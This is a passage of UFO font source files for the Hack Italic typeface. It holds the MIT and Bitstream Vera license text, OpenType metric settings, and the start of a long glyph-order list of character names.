Reserved Font Names "Bitstream" and "Vera" MIT License Copyright (c) 2018 Source Foundry Authors Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. BITSTREAM VERA LICENSE Copyright (c) 2003 by Bitstream, Inc. All Rights Reserved. Bitstream Vera is a trademark of Bitstream, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of the fonts accompanying this license ("Fonts") and associated documentation files (the "Font Software"), to reproduce and distribute the Font Software, including without limitation the rights to use, copy, merge, publish, distribute, and/or sell copies of the Font Software, and to permit persons to whom the Font Software is furnished to do so, subject to the following conditions: The above copyright and trademark notices and this permission notice shall be included in all copies of one or more of the Font Software typefaces. The Font Software may be modified, altered, or added to, and in particular the designs of glyphs or characters in the Fonts may be modified and additional glyphs or characters may be added to the Fonts, only if the fonts are renamed to names not containing either the words "Bitstream" or the word "Vera". This License becomes null and void to the extent applicable to Fonts or Font Software that has been modified and is distributed under the "Bitstream Vera" names. The Font Software may be sold as part of a larger software package but no copy of one or more of the Font Software typefaces may be sold by itself. THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL BITSTREAM OR THE GNOME FOUNDATION BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM OTHER DEALINGS IN THE FONT SOFTWARE. Except as contained in this notice, the names of Gnome, the Gnome Foundation, and Bitstream Inc., shall not be used in advertising or otherwise to promote the sale, use or other dealings in this Font Software without prior written authorization from the Gnome Foundation or Bitstream Inc., respectively. For further information, contact: fonts at gnome dot org.</string> <key>openTypeNameLicenseURL</key> <string>https://github.com/source-foundry/Hack/blob/master/LICENSE.md</string> <key>openTypeNameManufacturer</key> <string>Source Foundry</string> <key>openTypeNameManufacturerURL</key> <string>https://github.com/source-foundry</string> <key>openTypeNamePreferredFamilyName</key> <string>Hack</string> <key>openTypeNamePreferredSubfamilyName</key> <string>Italic</string> <key>openTypeNameSampleText</key> <string></string> <key>openTypeNameUniqueID</key> <string>SourceFoundry: Hack Italic: 2018</string> <key>openTypeNameVersion</key> <string>Version 3.003</string> <key>openTypeOS2CodePageRanges</key> <array> <integer>0</integer> <integer>1</integer> <integer>2</integer> <integer>3</integer> <integer>4</integer> <integer>7</integer> <integer>8</integer> <integer>48</integer> <integer>49</integer> <integer>50</integer> <integer>52</integer> <integer>54</integer> <integer>55</integer> <integer>56</integer> <integer>57</integer> <integer>58</integer> <integer>59</integer> <integer>60</integer> <integer>62</integer> <integer>63</integer> </array> <key>openTypeOS2FamilyClass</key> <array> <integer>0</integer> <integer>0</integer> </array> <key>openTypeOS2Panose</key> <array> <integer>2</integer> <integer>11</integer> <integer>6</integer> <integer>9</integer> <integer>3</integer> <integer>2</integer> <integer>2</integer> <integer>9</integer> <integer>2</integer> <integer>4</integer> </array> <key>openTypeOS2Selection</key> <array> </array> <key>openTypeOS2StrikeoutPosition</key> <integer>530</integer> <key>openTypeOS2StrikeoutSize</key> <integer>102</integer> <key>openTypeOS2SubscriptXOffset</key> <integer>-29</integer> <key>openTypeOS2SubscriptXSize</key> <integer>1331</integer> <key>openTypeOS2SubscriptYOffset</key> <integer>153</integer> <key>openTypeOS2SubscriptYSize</key> <integer>1228</integer> <key>openTypeOS2SuperscriptXOffset</key> <integer>136</integer> <key>openTypeOS2SuperscriptXSize</key> <integer>1331</integer> <key>openTypeOS2SuperscriptYOffset</key> <integer>716</integer> <key>openTypeOS2SuperscriptYSize</key> <integer>1228</integer> <key>openTypeOS2Type</key> <array> <integer>0</integer> </array> <key>openTypeOS2TypoAscender</key> <integer>1556</integer> <key>openTypeOS2TypoDescender</key> <integer>-492</integer> <key>openTypeOS2TypoLineGap</key> <integer>410</integer> <key>openTypeOS2UnicodeRanges</key> <array> <integer>0</integer> <integer>1</integer> <integer>2</integer> <integer>3</integer> <integer>5</integer> <integer>6</integer> <integer>7</integer> <integer>9</integer> <integer>10</integer> <integer>24</integer> <integer>26</integer> <integer>29</integer> <integer>31</integer> <integer>32</integer> <integer>33</integer> <integer>35</integer> <integer>36</integer> <integer>37</integer> <integer>38</integer> <integer>39</integer> <integer>43</integer> <integer>44</integer> <integer>45</integer> </array> <key>openTypeOS2VendorID</key> <string>SRC</string> <key>openTypeOS2WeightClass</key> <integer>400</integer> <key>openTypeOS2WidthClass</key> <integer>5</integer> <key>openTypeOS2WinAscent</key> <integer>1901</integer> <key>openTypeOS2WinDescent</key> <integer>483</integer> <key>postscriptBlueFuzz</key> <integer>0</integer> <key>postscriptBlueScale</key> <real>0.036999999999999998</real> <key>postscriptBlueShift</key> <integer>14</integer> <key>postscriptBlueValues</key> <array> <integer>-29</integer> <integer>0</integer> <integer>1120</integer> <integer>1149</integer> <integer>1493</integer> <integer>1520</integer> </array> <key>postscriptFontName</key> <string>Hack-Italic</string> <key>postscriptForceBold</key> <false/> <key>postscriptFullName</key> <string>Hack Italic</string> <key>postscriptIsFixedPitch</key> <true/> <key>postscriptOtherBlues</key> <array> <integer>-440</integer> <integer>-426</integer> </array> <key>postscriptStemSnapH</key> <array> <integer>170</integer> <integer>143</integer> <integer>156</integer> </array> <key>postscriptStemSnapV</key> <array> <integer>160</integer> <integer>114</integer> <integer>194</integer> <integer>320</integer> </array> <key>postscriptUnderlinePosition</key> <integer>-220</integer> <key>postscriptUnderlineThickness</key> <integer>90</integer> <key>postscriptUniqueID</key> <integer>-1</integer> <key>styleMapFamilyName</key> <string>Hack</string> <key>styleMapStyleName</key> <string>italic</string> <key>styleName</key> <string>Italic</string> <key>trademark</key> <string></string> <key>unitsPerEm</key> <integer>2048</integer> <key>versionMajor</key> <integer>3</integer> <key>versionMinor</key> <integer>003</integer> <key>xHeight</key> <integer>1120</integer> </dict> </plist>
Hack/source/Hack-Italic.ufo/lib.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>public.glyphOrder</key> <array> <string>.notdef</string> <string>NULL</string> <string>CR</string> <string>space</string> <string>Acircumflex</string> <string>Adieresis</string> <string>Agrave</string> <string>Amacron</string> <string>Aogonek</string> <string>Aring</string> <string>Atilde</string> <string>AE</string> <string>B</string> <string>C</string> <string>Cacute</string> <string>Ccaron</string> <string>Ccedilla</string> <string>Cdotaccent</string> <string>D</string> <string>Eth</string> <string>Dcaron</string> <string>Dcroat</string> <string>E</string> <string>Eacute</string> <string>Ecaron</string> <string>Ecircumflex</string> <string>Edieresis</string> <string>Edotaccent</string> <string>Egrave</string> <string>Emacron</string> <string>Eogonek</string> <string>F</string> <string>G</string> <string>Gbreve</string> <string>Gcaron</string> <string>uni0122</string> <string>Gdotaccent</string> <string>H</string> <string>Hbar</string> <string>I</string> <string>Iacute</string> <string>Icircumflex</string> <string>Idieresis</string> <string>Idotaccent</string> <string>Igrave</string> <string>Imacron</string> <string>Iogonek</string> <string>Itilde</string> <string>J</string> <string>K</string> <string>uni0136</string> <string>L</string> <string>Lacute</string> <string>Lcaron</string> <string>uni013B</string> <string>Lslash</string> <string>M</string> <string>N</string> <string>Nacute</string> <string>Ncaron</string> <string>uni0145</string> <string>Eng</string> <string>Ntilde</string> <string>O</string> <string>Oacute</string> <string>Ocircumflex</string> <string>Odieresis</string> <string>Ograve</string> <string>Ohorn</string> <string>Ohungarumlaut</string> <string>Omacron</string> <string>Oslash</string> <string>Oslashacute</string> <string>Otilde</string> <string>OE</string> <string>P</string> <string>Thorn</string> <string>Q</string> <string>R</string> <string>Racute</string> <string>Rcaron</string> <string>uni0156</string> <string>S</string> <string>Sacute</string> <string>Scaron</string> <string>Scedilla</string> <string>uni0218</string> <string>T</string> <string>Tbar</string> <string>Tcaron</string> <string>uni021A</string> <string>U</string> <string>Uacute</string> <string>Ucircumflex</string> <string>Udieresis</string> <string>Ugrave</string> <string>Uhorn</string> <string>Uhungarumlaut</string> <string>Umacron</string> <string>Uogonek</string> <string>Uring</string> <string>Utilde</string> <string>V</string> <string>W</string> <string>Wacute</string> <string>Wcircumflex</string> <string>Wdieresis</string> <string>Wgrave</string> <string>X</string> <string>Y</string> <string>Yacute</string> <string>Ycircumflex</string> <string>Ydieresis</string> <string>Ygrave</string> <string>Z</string> <string>Zacute</string> <string>Zcaron</string> <string>Zdotaccent</string> <string>a</string> <string>aacute</string> <string>abreve</string> <string>acircumflex</string> <string>adieresis</string> <string>agrave</string> <string>amacron</string> <string>aogonek</string> <string>aring</string> <string>atilde</string> <string>ae</string> <string>b</string> <string>c</string> <string>cacute</string> <string>ccaron</string> <string>ccedilla</string> <string>cdotaccent</string> <string>d</string> <string>eth</string> <string>dcaron</string> <string>dcroat</string> <string>e</string> <string>eacute</string> <string>ecaron</string> <string>ecircumflex</string> <string>edieresis</string> <string>edotaccent</string> <string>egrave</string> <string>emacron</string> <string>Ebreve</string> <string>ebreve</string> <string>eogonek</string> <string>f</string> <string>g</string> <string>gbreve</string> <string>gcaron</string> <string>uni0123</string> <string>gdotaccent</string> <string>h</string> <string>hbar</string> <string>i</string> <string>dotlessi</string> <string>iacute</string> <string>icircumflex</string> <string>idieresis</string> <string>igrave</string> <string>imacron</string> <string>Ibreve</string> <string>ibreve</string> <string>iogonek</string> <string>itilde</string> <string>j</string> <string>k</string> <string>uni0137</string> <string>l</string> <string>lacute</string> <string>lcaron</string> <string>longs</string> <string>uni013C</string> <string>lslash</string> <string>m</string> <string>n</string> <string>nacute</string> <string>ncaron</string> <string>uni0146</string> <string>eng</string> <string>ntilde</string> <string>o</string> <string>oacute</string> <string>ocircumflex</string> <string>odieresis</string> <string>ograve</string> <string>ohorn</string> <string>ohungarumlaut</string> <string>omacron</string> <string>Obreve</string> <string>obreve</string> <string>oslash</string> <string>oslashacute</string> <string>otilde</string> <string>oe</string> <string>p</string> <string>thorn</string> <string>q</string> <string>r</string> <string>racute</string> <string>rcaron</string> <string>uni0157</string> <string>s</string> <string>sacute</string> <string>scaron</string> <string>scedilla</string> <string>uni0219</string> <string>germandbls</string> <string>t</string> <string>tbar</string> <string>tcaron</string> <string>uni021B</string> <string>u</string> <string>uacute</string> <string>ucircumflex</string> <string>udieresis</string> <string>ugrave</string> <string>uhorn</string> <string>uhungarumlaut</string> <string>umacron</string> <string>uogonek</string> <string>uring</string> <string>utilde</string> <string>v</string> <string>w</string> <string>wacute</string> <string>wcircumflex</string> <string>wdieresis</string> <string>wgrave</string> <string>x</string> <string>y</string> <string>yacute</string> <string>ycircumflex</string> <string>ydieresis</string> <string>ygrave</string> <string>z</string> <string>zacute</string> <string>zcaron</string> <string>zdotaccent</string> <string>ordfeminine</string> <string>ordmasculine</string> <string>uni0410</string> <string>uni0411</string> <string>uni0412</string> <string>uni0413</string> <string>uni0403</string> <string>uni0490</string> <string>uni0414</string> <string>uni0415</string> <string>uni0400</string> <string>uni0401</string> <string>uni0416</string> <string>uni0417</string> <string>uni0418</string> <string>uni0419</string> <string>uni040D</string> <string>uni041A</string> <string>uni040C</string> <string>uni041B</string> <string>uni041C</string> <string>uni041D</string> <string>uni041E</string> <string>uni041F</string> <string>uni0420</string> <string>uni0421</string> <string>uni0422</string> <string>uni0423</string> <string>uni040E</string> <string>uni0424</string> <string>uni0425</string> <string>uni0427</string> <string>uni0426</string> <string>uni0428</string> <string>uni0429</string> <string>uni040F</string> <string>uni042F</string> <string>uni042C</string> <string>uni042A</string> <string>uni042B</string> <string>uni0409</string> <string>uni040A</string> <string>uni0405</string> <string>uni0404</string> <string>uni042D</string> <string>uni0406</string> <string>uni0407</string> <string>uni0408</string> <string>uni040B</string> <string>uni042E</string> <string>uni0402</string> <string>uni0462</string> <string>uni0472</string> <string>uni0492</string> <string>uni0494</string> <string>uni0496</string> <string>uni0498</string> <string>uni049A</string> <string>uni04A2</string> <string>uni04AA</string> <string>uni04AC</string> <string>uni04AE</string> <string>uni04B0</string> <string>uni04B2</string> <string>uni04BA</string> <string>uni04C0</string> <string>uni04C1</string> <string>uni04C3</string> <string>uni04C7</string> <string>uni04CB</string> <string>uni04D0</string> <string>uni04D2</string> <string>uni04D6</string> <string>uni04D8</string> <string>uni04DA</string> <string>uni04DC</string> <string>uni04DE</string> <string>uni04E0</string> <string>uni04E2</string> <string>uni04E4</string> <string>uni04E6</string> <string>uni04E8</string> <string>uni04EA</string> <string>uni04EC</string> <string>uni04EE</string> <string>uni04F0</string> <string>uni04F2</string> <string>uni04F4</string> <string>uni04F6</string> <string>uni04F8</string> <string>uni0510</string> <string>uni051A</string> <string>uni051C</string> <string>uni0430</string> <string>uni0431</string> <string>uni0432</string> <string>uni0433</string> <string>uni0453</string> <string>uni0491</string> <string>uni0434</string> <string>uni0435</string> <string>uni0450</string> <string>uni0451</string> <string>uni0436</string> <string>uni0437</string> <string>uni0438</string> <string>uni0439</string> <string>uni045D</string> <string>uni043A</string> <string>uni045C</string> <string>uni043B</string> <string>uni043C</string> <string>uni043D</string> <string>uni043E</string> <string>uni043F</string> <string>uni0440</string> <string>uni0441</string> <string>uni0442</string> <string>uni0443</string> <string>uni045E</string> <string>uni0444</string> <string>uni0445</string> <string>uni0447</string> <string>uni0446</string> <string>uni0448</string> <string>uni0449</string> <string>uni045F</string> <string>uni044F</string> <string>uni044C</string> <string>uni044A</string> <string>uni044B</string> <string>uni0459</string> <string>uni045A</string> <string>uni0455</string> <string>uni0454</string> <string>uni044D</string> <string>uni0456</string> <string>uni0457</string> <string>uni0458</string> <string>uni045B</string> <string>uni044E</string> <string>uni0452</string> <string>uni0463</string> <string>uni0473</string> <string>uni0493</string> <string>uni0495</string> <string>uni0497</string> <string>uni0499</string> <string>uni049B</string> <string>uni04A3</string> <string>uni04AB</string> <string>uni04AD</string> <string>uni04AF</string> <string>uni04B1</string> <string>uni04B3</string> <string>uni04BB</string> <string>uni04CF</string> <string>uni04C2</string> <string>uni04C4</string> <string>uni04C8</string> <string>uni04CC</string> <string>uni04D1</string> <string>uni04D3</string> <string>uni04D7</string> <string>uni04D9</string> <string>uni04DB</string> <string>uni04DD</string> <string>uni04DF</string> <string>uni04E1</string> <string>uni04E3</string> <string>uni04E5</string> <string>uni04E7</string> <string>uni04E9</string> <string>uni04EB</string> <string>uni04ED</string> <string>uni04EF</string> <string>uni04F1</string> <string>uni04F3</string> <string>uni04F5</string> <string>uni04F7</string> <string>uni04F9</string> <string>uni0511</string> <string>uni051B</string> <string>uni051D</string> <string>uni04A4</string> <string>uni04A5</string> <string>uni04D4</string> <string>uni04D5</string> <string>uni0394</string> <string>uni03F4</string> <string>uni03BC</string> <string>uni0531</string> <string>uni0532</string> <string>uni0533</string> <string>uni0534</string> <string>uni0535</string> <string>uni0536</string> <string>uni0537</string> <string>uni0538</string> <string>uni0539</string> <string>uni053A</string> <string>uni053B</string> <string>uni053C</string> <string>uni053D</string> <string>uni053E</string> <string>uni053F</string> <string>uni0540</string> <string>uni0541</string> <string>uni0542</string> <string>uni0543</string> <string>uni0544</string> <string>uni0545</string> <string>uni0546</string> <string>uni0547</string> <string>uni0548</string> <string>uni0549</string> <string>uni054A</string> <string>uni054B</string> <string>uni054C</string> <string>uni054D</string> <string>uni054E</string> <string>uni054F</string> <string>uni0550</string> <string>uni0551</string> <string>uni0552</string> <string>uni0553</string> <string>uni0554</string> <string>uni0555</string> <string>uni0556</string> <string>uni0561</string> <string>uni0562</string> <string>uni0563</string> <string>uni0564</string> <string>uni0565</string> <string>uni0566</string> <string>uni0567</string> <string>uni0568</string> <string>uni0569</string> <string>uni056A</string> <string>uni056B</string> <string>uni056C</string> <string>uni056D</string> <string>uni056E</string> <string>uni056F</string> <string>uni0570</string> <string>uni0571</string> <string>uni0572</string> <string>uni0573</string> <string>uni0574</string> <string>uni0575</string> <string>uni0576</string> <string>uni0577</string> <string>uni0578</string> <string>uni0579</string> <string>uni057A</string> <string>uni057B</string> <string>uni057C</string> <string>uni057D</string> <string>uni057E</string> <string>uni057F</string> <string>uni0580</string> <string>uni0581</string> <string>uni0582</string> <string>uni0583</string> <string>uni0584</string> <string>uni0585</string> <string>uni0586</string> <string>uni0587</string> <string>uni10D0</string> <string>uni10D1</string> <string>uni10D2</string> <string>uni10D3</string> <string>uni10D4</string> <string>uni10D5</string> <string>uni10D6</string> <string>uni10D7</string> <string>uni10D8</string> <string>uni10D9</string> <string>uni10DA</string> <string>uni10DB</string> <string>uni10DC</string> <string>uni10DD</string> <string>uni10DE</string> <string>uni10DF</string> <string>uni10E0</string> <string>uni10E1</string> <string>uni10E2</string> <string>uni10E3</string> <string>uni10E4</string> <string>uni10E5</string> <string>uni10E6</string> <string>uni10E7</string> <string>uni10E8</string> <string>uni10E9</string> <string>uni10EA</string> <string>uni10EB</string> <string>uni10EC</string> <string>uni10ED</string> <string>uni10EE</string> <string>uni10EF</string> <string>uni10F0</string> <string>uni10F1</string> <string>uni10F2</string> <string>uni10F3</string> <string>uni10F4</string> <string>uni10F5</string> <string>uni10F6</string> <string>uni10F7</string> <string>uni10F8</string> <string>uni10F9</string> <string>uni10FA</string> <string>uni10FC</string> <string>zero</string> <string>one</string> <string>two</string> <string>three</string> <string>four</string> <string>five</string> <string>six</string> <string>seven</string> <string>eight</string> <string>nine</string> <string>uni2215</string> <string>uni215F</string> <string>onehalf</string> <string>uni2189</string> <string>uni2153</string> <string>uni2154</string> <string>onequarter</string> <string>threequarters</string> <string>oneeighth</string> <string>threeeighths</string> <string>fiveeighths</string> <string>seveneighths</string> <string>uni00B9</string> <string>uni00B2</string> <string>uni00B3</string> <string>uni2074</string> <string>uni2075</string> <string>uni2076</string> <string>uni2077</string> <string>uni2078</string> <string>uni2079</string> <string>asterisk</string> <string>backslash</string> <string>uni2219</string> <string>bullet</string> <string>colon</string> <string>comma</string> <string>onedotenleader</string> <string>twodotenleader</string> <string>ellipsis</string> <string>exclam</string> <string>exclamdbl</string> <string>exclamdown</string> <string>numbersign</string> <string>period</string> <string>question</string> <string>uni2047</string> <string>questiondown</string> <string>quotedbl</string> <string>quotesingle</string> <string>semicolon</string> <string>slash</string> <string>underscore</string> <string>underscoredbl</string> <string>uni2016</string> <string>uni2023</string> <string>hyphenationpoint</string> <string>uni203D</string> <string>uni203E</string> <string>uni203F</string> <string>uni2045</string> <string>uni2046</string> <string>uni2048</string> <string>uni2049</string> <string>uni204B</string> <string>uni2E18</string> <string>uni2E1F</string> <string>uni2E2E</string> <string>exclamdown.case</string> <string>uni2E18.case</string> <string>questiondown.case</string> <string>uni208D</string> <string>uni208E</string> <string>braceleft</string> <string>braceright</string> <string>bracketleft</string> <string>bracketright</string> <string>uni2E24</string> <string>uni2E25</string> <string>uni2E22</string> <string>uni2E23</string> <string>parenleft</string> <string>parenright</string> <string>uni207D</string> <string>uni207E</string> <string>uni27C5</string> <string>uni27C6</string> <string>uni2987</string> <string>uni2988</string> <string>uni2997</string> <string>uni2998</string> <string>emdash</string> <string>endash</string> <string>figuredash</string> <string>hyphen</string> <string>uni00AD</string> <string>uni2010</string> <string>uni2011</string> <string>uni2015</string> <string>guilsinglleft</string> <string>guilsinglright</string> <string>quotedblbase</string> <string>quotedblleft</string> <string>quotedblright</string> <string>quoteleft</string> <string>quotereversed</string> <string>quoteright</string> <string>quotesinglbase</string> <string>uni201F</string> <string>minute</string> <string>second</string> <string>millisecond</string> <string>uni2035</string> <string>uni2036</string> <string>uni2037</string> <string>uni27E6</string> <string>uni27E7</string> <string>uni27E8</string> <string>uni27E9</string> <string>uni27EA</string> <string>uni27EB</string> <string>uni10FB</string> <string>uni055A</string> <string>uni055B</string> <string>uni055C</string> <string>uni055D</string> <string>uni055E</string> <string>uni055F</string> <string>uni0589</string> <string>uni058A</string> <string>uni205F</string> <string>uni00A0</string> <string>uni2000</string> <string>uni2001</string> <string>uni2002</string> <string>uni2003</string> <string>uni2004</string> <string>uni2005</string> <string>uni2006</string> <string>uni2007</string> <string>uni2008</string> <string>uni2009</string> <string>uni200A</string> <string>uni202F</string> <string>Abreve</string> <string>cent</string> <string>colonmonetary</string> <string>currency</string> <string>dollar</string> <string>dong</string> <string>Euro</string> <string>florin</string> <string>franc</string> <string>lira</string> <string>peseta</string> <string>sterling</string> <string>uni0E3F</string> <string>uni20A0</string> <string>uni20A2</string> <string>uni20A5</string> <string>uni20A6</string> <string>uni20A8</string> <string>uni20A9</string> <string>uni20AA</string> <string>uni20B0</string> <string>uni20B1</string> <string>uni20B2</string> <string>uni20B3</string> <string>uni20B4</string> <string>uni20B5</string> <string>uni20B8</string> <string>uni20B9</string> <string>yen</string> <string>angle</string> <string>approxequal</string> <string>asteriskmath</string> <string>asciitilde</string> <string>circlemultiply</string> <string>circleplus</string> <string>congruent</string> <string>divide</string> <string>dotmath</string> <string>element</string> <string>emptyset</string> <string>equal</string> <string>equivalence</string> <string>existential</string> <string>gradient</string> <string>greater</string> <string>greaterequal</string> <string>infinity</string> <string>integral</string> <string>integralbt</string> <string>integraltp</string> <string>intersection</string> <string>less</string> <string>lessequal</string> <string>logicaland</string> <string>logicalnot</string> <string>logicalor</string> <string>minus</string> <string>multiply</string> <string>notelement</string> <string>notequal</string> <string>notsubset</string> <string>orthogonal</string> <string>partialdiff</string> <string>percent</string> <string>uni27C2</string> <string>perthousand</string> <string>plus</string> <string>plusminus</string> <string>product</string> <string>propersubset</string> <string>propersuperset</string> <string>proportional</string> <string>radical</string> <string>reflexsubset</string> <string>reflexsuperset</string> <string>revlogicalnot</string> <string>similar</string> <string>suchthat</string> <string>summation</string> <string>therefore</string> <string>uni2031</string> <string>uni207A</string> <string>uni207B</string> <string>uni207C</string> <string>uni208A</string> <string>uni208B</string> <string>uni208C</string> <string>uni2126</string> <string>uni2201</string> <string>uni2204</string> <string>uni220A</string> <string>uni220C</string> <string>uni220D</string> <string>uni220E</string> <string>uni2210</string> <string>uni2213</string> <string>uni2218</string> <string>uni221B</string> <string>uni221C</string> <string>uni2223</string> <string>uni222C</string> <string>uni222D</string> <string>uni2235</string> <string>uni2236</string> <string>uni2237</string> <string>uni2238</string> <string>uni2239</string> <string>uni223A</string> <string>uni223B</string> <string>uni223D</string> <string>uni2241</string> <string>uni2242</string> <string>uni2243</string> <string>uni2244</string> <string>uni2246</string> <string>uni2247</string> <string>uni2249</string> <string>uni224A</string> <string>uni224B</string> <string>uni224C</string> <string>uni224D</string> <string>uni224E</string> <string>uni224F</string> <string>uni2250</string> <string>uni2251</string> <string>uni2252</string> <string>uni2253</string> <string>uni2254</string> <string>uni2255</string> <string>uni2256</string> <string>uni2257</string> <string>uni2258</string> <string>uni2259</string> <string>uni225A</string> <string>uni225B</string> <string>uni225C</string> <string>uni225D</string> <string>uni225E</string> <string>uni225F</string> <string>uni2262</string> <string>uni2263</string> <string>uni2266</string> <string>uni2267</string> <string>uni2268</string> <string>uni2269</string> <string>uni226D</string> <string>uni226E</string> <string>uni226F</string> <string>uni2270</string> <string>uni2271</string> <string>uni2272</string> <string>uni2273</string> <string>uni2274</string> <string>uni2275</string> <string>uni2276</string> <string>uni2277</string> <string>uni2278</string> <string>uni2279</string> <string>uni227A</string> <string>uni227B</string> <string>uni227C</string> <string>uni227D</string> <string>uni227E</string> <string>uni227F</string> <string>uni2280</string> <string>uni2281</string> <string>uni2285</string> <string>uni2288</string> <string>uni2289</string> <string>uni228A</string> <string>uni228B</string> <string>uni228D</string> <string>uni228E</string> <string>uni228F</string> <string>uni2290</string> <string>uni2291</string> <string>uni2292</string> <string>uni2293</string> <string>uni2294</string> <string>uni2296</string> <string>uni2298</string> <string>uni2299</string> <string>uni229A</string> <string>uni229B</string> <string>uni229C</string> <string>uni229D</string> <string>uni229E</string> <string>uni229F</string> <string>uni22A0</string> <string>uni22A1</string> <string>uni22A2</string> <string>uni22A3</string> <string>uni22A4</string> <string>uni22B2</string> <string>uni22B3</string> <string>uni22B4</string> <string>uni22B5</string> <string>uni22B8</string> <string>uni22C2</string> <string>uni22C3</string> <string>uni22C4</string> <string>uni22C6</string> <string>uni22CD</string> <string>uni22CE</string> <string>uni22CF</string> <string>uni22D0</string> <string>uni22D1</string> <string>uni22DA</string> <string>uni22DB</string> <string>uni22DC</string> <string>uni22DD</string> <string>uni22DE</string> <string>uni22DF</string> <string>uni22E0</string> <string>uni22E1</string> <string>uni22E2</string> <string>uni22E3</string> <string>uni22E4</string> <string>uni22E5</string> <string>uni22E6</string> <string>uni22E7</string> <string>uni22E8</string> <string>uni22E9</string> <string>uni22EF</string> <string>uni2308</string> <string>uni2309</string> <string>uni230A</string> <string>uni230B</string> <string>uni239B</string> <string>uni239C</string> <string>uni239D</string> <string>uni239E</string> <string>uni239F</string> <string>uni23A0</string> <string>uni23A1</string> <string>uni23A2</string> <string>uni23A3</string> <string>uni23A4</string> <string>uni23A5</string> <string>uni23A6</string> <string>uni23A7</string> <string>uni23A8</string> <string>uni23A9</string> <string>uni23AA</string> <string>uni23AB</string> <string>uni23AC</string> <string>uni23AD</string> <string>uni23AE</string> <string>uni27DC</string> <string>uni27E0</string> <string>uni29EB</string> <string>uni29FA</string> <string>uni29FB</string> <string>uni2A00</string> <string>uni2A2F</string> <string>uni2A6A</string> <string>uni2A6B</string> <string>union</string> <string>universal</string> <string>arrowup</string> <string>uni2197</string> <string>arrowright</string> <string>uni2198</string> <string>arrowdown</string> <string>uni2199</string> <string>arrowleft</string> <string>uni2196</string> <string>arrowboth</string> <string>arrowupdn</string> <string>uni21F5</string> <string>uni219A</string> <string>uni219B</string> <string>uni21F7</string> <string>uni21F8</string> <string>uni21F9</string> <string>uni21FA</string> <string>uni21FB</string> <string>uni21AE</string> <string>uni21FC</string> <string>uni219C</string> <string>uni219D</string> <string>uni21AD</string> <string>uni219E</string> <string>uni219F</string> <string>uni21A0</string> <string>uni21A1</string> <string>uni21A2</string> <string>uni21A3</string> <string>uni21A4</string> <string>uni21A5</string> <string>uni21A6</string> <string>uni21A7</string> <string>arrowupdnbse</string> <string>uni21E4</string> <string>uni21E5</string> <string>uni21B9</string> <string>uni21A9</string> <string>uni21AA</string> <string>uni21AB</string> <string>uni21AC</string> <string>uni21AF</string> <string>uni21B0</string> <string>uni21B1</string> <string>uni21B2</string> <string>uni21B3</string> <string>uni21B4</string> <string>carriagereturn</string> <string>uni21B6</string> <string>uni21B7</string> <string>uni21B8</string> <string>uni21F1</string> <string>uni21F2</string> <string>uni21BA</string> <string>uni21BB</string> <string>uni21BC</string> <string>uni21BD</string> <string>uni21BE</string> <string>uni21BF</string> <string>uni21C0</string> <string>uni21C1</string> <string>uni21C2</string> <string>uni21C3</string> <string>uni21CB</string> <string>uni21CC</string> <string>uni21C4</string> <string>uni21C5</string> <string>uni21C6</string> <string>uni21C8</string> <string>uni21C9</string> <string>uni21CA</string> <string>uni21C7</string> <string>arrowdblup</string> <string>uni21D7</string> <string>arrowdblright</string> <string>uni21D8</string> <string>arrowdbldown</string> <string>uni21D9</string> <string>arrowdblleft</string> <string>uni21D6</string> <string>arrowdblboth</string> <string>uni21D5</string> <string>uni21CD</string> <string>uni21CE</string> <string>uni21CF</string> <string>uni21DA</string> <string>uni21DB</string> <string>uni21DC</string> <string>uni21DD</string> <string>uni21E0</string> <string>uni21E1</string> <string>uni21E2</string> <string>uni21E3</string> <string>uni21E7</string> <string>uni21E8</string> <string>uni21E9</string> <string>uni21E6</string> <string>uni21EB</string> <string>uni21EC</string> <string>uni21ED</string> <string>uni21EE</string> <string>uni21EF</string> <string>uni21F0</string> <string>uni21F3</string> <string>uni21F4</string> <string>uni21F6</string> <string>uni21FD</string> <string>uni21FE</string> <string>uni21FF</string> <string>uni2304</string> <string>uni2B06</string> <string>uni2B08</string> <string>uni2B0A</string> <string>uni2B07</string> <string>uni2B0B</string> <string>uni2B05</string> <string>uni2B09</string> <string>uni2B0C</string> <string>uni2B0D</string> <string>uni27F5</string> <string>uni27F6</string> <string>uni27F7</string> <string>uni2581</string> <string>uni2582</string> <string>uni2583</string> <string>dnblock</string> <string>uni2585</string> <string>uni2586</string> <string>uni2587</string> <string>block</string> <string>upblock</string> <string>uni2594</string> <string>uni258F</string> <string>uni258E</string> <string>uni258D</string> <string>lfblock</string> <string>uni258B</string> <string>uni258A</string> <string>uni2589</string> <string>rtblock</string> <string>uni2595</string> <string>uni2596</string> <string>uni2597</string> <string>uni2598</string> <string>uni2599</string> <string>uni259A</string> <string>uni259B</string> <string>uni259C</string> <string>uni259D</string> 